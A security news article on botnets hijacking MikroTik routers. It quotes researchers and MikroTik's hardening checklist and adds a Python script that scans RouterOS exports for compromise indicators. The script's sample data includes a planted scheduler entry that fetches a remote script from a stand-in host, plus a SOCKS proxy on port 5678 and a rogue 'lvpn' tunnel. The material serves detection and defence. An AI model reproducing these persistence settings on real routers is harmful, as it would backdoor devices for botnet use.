The researchers stated that “these technologies are both strong and often exceedingly vulnerable. As a result, threat actors have commandeered MikroTik devices for anything from DDoS attacks to command-and-control (also known as ‘C2’), traffic tunnelling and more.”
Cybersecurity firm Eclypsium reported that “China, Brazil, Russia, Italy, and Indonesia had the most afflicted devices, with the United States coming in eighth.”
At least 300,000 IP addresses associated with MikroTik devices were discovered to be vulnerable to various remotely exploitable security flaws, which the prominent router and wireless ISP equipment supplier has now addressed.
MikroTik devices are an attractive target, not least because there are more than two million of them in use around the world, creating a large attack surface that threat actors can use to launch a variety of attacks.
MikroTik routers aren’t the only devices that have become part of a botnet. Fortinet researchers showed this week how the Moobot botnet is growing its network and using infected devices to perform distributed denial-of-service (DDoS) attacks by exploiting a known remote code execution (RCE) vulnerability in Hikvision video surveillance equipment (CVE-2021-36260).
The researchers added that “An attacker might possibly collect sensitive information by employing well-known tactics and technologies, such as SMS over WiFi to steal MFA credentials from a distant user. Enterprise traffic might be tunnelled to another location, or malicious content could be inserted into legitimate traffic, as in past assaults.”
MikroTik's instructions to device owners include:
- Keep your MikroTik device up to date with regular upgrades.
- Do not open access to your device from the internet side to everyone; if you need remote access, only open a secure VPN service, like IPsec.
- Use a strong password, and even if you do, change it now!
- Don’t assume your local network can be trusted. Malware can attempt to connect to your router if you have a weak password or no password.
- Inspect your RouterOS configuration for unknown settings, including:
  - System -> Scheduler rules that execute a Fetch script. Remove these.
  - IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled.
  - L2TP client named “lvpn” or any L2TP client that you don’t recognize.
  - Input firewall rule that allows access for port 5678.
- Block domains and tunnel endpoints associated with the Meris botnet.
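The four configuration checks above can be run mechanically against a RouterOS `/export` dump rather than clicked through in WinBox. The script below is an added example written for this page; it is not MikroTik's or Eclypsium's code. It assumes the export follows the usual layout (a section header starting with `/`, followed by `add ...`/`set ...` lines, with long lines continued by a trailing backslash), and the `SAMPLE_EXPORT` text is a constructed sample that seeds one hit per indicator plus benign entries, so it can be run offline. The matching is heuristic: it flags scheduler entries whose `on-event` contains `fetch`, a SOCKS section with `enabled=yes`, an L2TP client named `lvpn`, and accepting input-chain filter rules whose `dst-port` list contains 5678.

```python
import re

# Constructed sample in the style of a RouterOS "/export" dump (not a real
# capture). One entry per section is benign, one matches an indicator.
SAMPLE_EXPORT = """\
/system scheduler
add interval=1h name=backup on-event="/system backup save name=daily" policy=read,write
add interval=10m name=U6 on-event="/tool fetch url=http://placeholder.invalid/x.rsc \\
    mode=http" policy=ftp,reboot,read,write
/ip socks
set enabled=yes port=5678
/interface l2tp-client
add connect-to=placeholder.invalid name=lvpn user=lvpn
add connect-to=vpn.corp.example name=corp-vpn user=site1
/ip firewall filter
add action=accept chain=input comment="office VPN" dst-port=500 protocol=udp
add action=accept chain=input dst-port=5678 protocol=tcp
add action=drop chain=input in-interface=ether1
"""

# Indicator per section: (human-readable label, predicate over one entry line).
# The values mirror the MikroTik checklist: fetch in a scheduler, SOCKS on,
# an L2TP client called "lvpn", an input rule admitting port 5678.
INDICATORS = {
    "/system scheduler": (
        "scheduler rule runs a fetch script",
        lambda l: "on-event=" in l and re.search(r"\bfetch\b", l) is not None),
    "/ip socks": (
        "SOCKS proxy enabled",
        lambda l: re.search(r"\benabled=yes\b", l) is not None),
    "/interface l2tp-client": (
        "L2TP client named lvpn",
        lambda l: re.search(r"\bname=lvpn\b", l) is not None),
    "/ip firewall filter": (
        "input firewall rule accepts port 5678",
        lambda l: "chain=input" in l and "action=accept" in l
        and re.search(r"dst-port=[\d,\-]*\b5678\b", l) is not None),
}


def _join_continuations(text):
    """Merge lines that RouterOS wraps with a trailing backslash."""
    entries, buf = [], ""
    for raw in text.splitlines():
        stripped = raw.rstrip()
        if stripped.endswith("\\"):
            buf += stripped[:-1]
            continue
        entries.append(buf + raw)
        buf = ""
    if buf:
        entries.append(buf)
    return entries


def audit_export(text):
    """Return (entry_no, section, label, entry) for every entry matching an indicator."""
    findings = []
    section = None
    for entry_no, raw in enumerate(_join_continuations(text), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("/"):            # section header, e.g. "/ip socks"
            section = line
            continue
        rule = INDICATORS.get(section)
        verb = line.split(" ", 1)[0]
        if rule and verb in ("add", "set") and rule[1](line):
            findings.append((entry_no, section, rule[0], line))
    return findings


if __name__ == "__main__":
    for entry_no, section, label, entry in audit_export(SAMPLE_EXPORT):
        print(f"[{label}] entry {entry_no} in {section}: {entry}")
```

Feed it the output of `/export` saved from the router; each hit names the section and the offending entry so it can be reviewed and removed by hand. A clean export returns an empty list, and any entry this does not recognise still needs the manual review the checklist calls for.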
The operators of a botnet known as Manga (aka Dark Mirai) are actively abusing a recently disclosed post-authentication remote code execution vulnerability (CVE-2021-41653) to hijack TP-Link routers and co-opt them into their network of infected devices.
Finally, the researchers concluded that “Users and businesses are exposed to a wide range of threats due to vulnerabilities in network equipment. For attackers, highly capable equipment like MikroTik routers are a very valuable weapon. These gadgets, on the other hand, frequently go unnoticed and are rarely updated or handled correctly. Organizations must be able to identify and assess this major attack surface both in the company and in the remote work settings of its employees.”